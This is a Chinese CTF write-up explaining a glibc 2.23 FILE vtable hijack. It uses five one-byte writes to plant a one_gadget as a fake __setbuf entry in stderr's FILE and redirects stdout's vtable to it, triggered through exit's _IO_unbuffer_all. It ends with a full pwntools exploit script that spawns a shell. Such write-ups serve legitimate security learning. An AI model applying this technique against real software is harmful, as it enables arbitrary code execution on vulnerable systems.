打的 libc2.23 ,借此学习基础的伪造 vtable 劫持程序流程.
程序给了 libc_base,有五次任意地址写 1 bytes 的机会,最后调用了一个 exit。
函数调用链:
pwndbg> bt
#0 _IO_unbuffer_all () at genops.c:898
#1 _IO_cleanup () at genops.c:960
#2 0x00007ffff7839fab in __run_exit_handlers (status=1337, listp=<optimized out>, run_list_atexit=run_list_atexit@entry=true)at exit.c:95
#3 0x00007ffff783a055 in __GI_exit (status=<optimized out>) at exit.c:104
#4 0x0000555555400969 in ?? ()
#5 0x00007ffff7820840 in __libc_start_main (main=0x5555554008d0, argc=1, argv=0x7fffffffbdc8, init=<optimized out>,fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffbdb8) at ../csu/libc-start.c:291
#6 0x00005555554007c9 in ?? ()
__GI_exit -> __run_exit_handlers -> _IO_cleanup -> _IO_unbuffer_all
int
_IO_cleanup (void)
{/* We do *not* want locking. Some threads might use streams butthat is their problem, we flush them underneath them. */int result = _IO_flush_all_lockp (0);/* We currently don't have a reliable mechanism for making sure thatC++ static destructors are executed in the correct order.So it is possible that other static destructors might want towrite to cout - and they're supposed to be able to do so.The following will make the standard streambufs be unbuffered,which forces any output from late destructors to be written out. */_IO_unbuffer_all ();return result;
}
可以看到在 _IO_unbuffer_all 之前还会有 _IO_flush_all_lockp 函数,然而由于 _IO_list_all 链表中只有 stdin、stdout 和 stderr,并不会触发里面对 _IO_OVERFLOW 的调用,因此实际上没有调用到任何虚表函数。
在 _IO_unbuffer_all 中会遍历 _IO_list_all 链表上的每一个 FILE,都会用到宏 _IO_SETBUF (fp, NULL, 0); 这个宏的定义就是从当前 FILE 的 vtable 指向的地址中找到 setbuf 函数并调用。
从 gdb 中可以看到 vtable 所指向的 _IO_file_jumps 的具体情况:
$1 = {__dummy = 0,__dummy2 = 0,__finish = 0x7ffff78799d0 <_IO_new_file_finish>,__overflow = 0x7ffff787a740 <_IO_new_file_overflow>,__underflow = 0x7ffff787a4b0 <_IO_new_file_underflow>,__uflow = 0x7ffff787b610 <__GI__IO_default_uflow>,__pbackfail = 0x7ffff787c990 <__GI__IO_default_pbackfail>,__xsputn = 0x7ffff78791f0 <_IO_new_file_xsputn>,__xsgetn = 0x7ffff7878ed0 <__GI__IO_file_xsgetn>,__seekoff = 0x7ffff78784d0 <_IO_new_file_seekoff>,__seekpos = 0x7ffff787ba10 <_IO_default_seekpos>,__setbuf = 0x7ffff7878440 <_IO_new_file_setbuf>,__sync = 0x7ffff7878380 <_IO_new_file_sync>,__doallocate = 0x7ffff786d190 <__GI__IO_file_doallocate>,__read = 0x7ffff78791b0 <__GI__IO_file_read>,__write = 0x7ffff7878b80 <_IO_new_file_write>,__seek = 0x7ffff7878980 <__GI__IO_file_seek>,__close = 0x7ffff7878350 <__GI__IO_file_close>,__stat = 0x7ffff7878b70 <__GI__IO_file_stat>,__showmanyc = 0x7ffff787cb00 <_IO_default_showmanyc>,__imbue = 0x7ffff787cb10 <_IO_default_imbue>
}
每个成员变量都是占 8 字节的空间,由此得出 __set_buf 的偏移。
程序 close 了 stdout 和 stderr,但是程序用的是 close 而非 fclose,close 是系统调用,不会执行任何关于 IO 的代码,仅仅是在内核态下收回了对应的 fd 值,在 glibc 的视角中,stdout 和 stderr 的 FILE 和 buf 没有任何改变,所有数据仍然在对应的内存上。
这两者的 FILE 结构体都在 libc 段上(其 buf 在堆上),没有被 free 掉或清 0,FILE 所在那块内存上的数据没有被覆盖,因此我们可以考虑在 stderr 的 FILE 结构体上伪造 fake vtable,再修改 stdout 的 vtable 指向这里。
具体地,将 _IO_2_1_stderr_->file->_wide_data 给 partial write 为 one_gadget,然后将它作为 __setbuf 指针,进而可以得到 fake_vtable 的首地址,然后再将 _IO_2_1_stdout->vtable 给 partial write 为 fake_vtable 的地址即可。
我在做的时候一开始是选择修改 _IO_2_1_stdin_ 的 vtable 和 file->chain,然而由于 __setbuf 的执行条件是有执行过关于该 FILE 的有缓冲区读写操作(因为这样才会申请对应的 buf),而 stdin 并没有(程序的读入是使用系统调用 read 实现的,同样直接绕过了 IO 的部分),所以不能够触发 __setbuf。
另外,由于用的 close() 是系统调用,不会把 stdout 和 stderr 从 _IO_list_all 上拿下来,所以它们仍然在链表上,此时修改了它们的 _chain,在遍历链表的时候就会报错。
所以最后选择的是 _IO_2_1_stdout_(程序使用了 printf)和 _wide_data。
exp
from pwn import *
io = process('./pwn')
libc = ELF('./libc-2.23.so')
def write(addr,byte):io.send(p64(addr))io.send(p8(byte))
def Exploit():io.recvuntil(b'here is a gift ')libc_base = io.recvuntil(b', ',drop=1)libc_base = int(libc_base,16)io.recvuntil(b'good luck ;)')libc_base = libc_base-libc.symbols['sleep']stderr_file = libc_base+libc.symbols['_IO_2_1_stderr_']stdout_file = libc_base+libc.symbols['_IO_2_1_stdout_']one_gadget = libc_base+0xf1247vtable_addr = stdout_file+216setbuf_addr = stderr_file+160fake_vtable = setbuf_addr-88print(hex(setbuf_addr),end=' ')print(hex(one_gadget))print(hex(vtable_addr),end=' ')print(hex(fake_vtable))write(setbuf_addr,(one_gadget&0xff))write(setbuf_addr+1,((one_gadget>>8)&0xff))write(setbuf_addr+2,((one_gadget>>16)&0xff))write(vtable_addr,(fake_vtable)&0xff)"""gdb.attach(io,f'''b *{one_gadget}''')pause()"""write(vtable_addr+1,(fake_vtable>>8)&0xff)io.sendline('exec 1>&0')io.sendline('ls')io.interactive()if __name__ == '__main__':Exploit()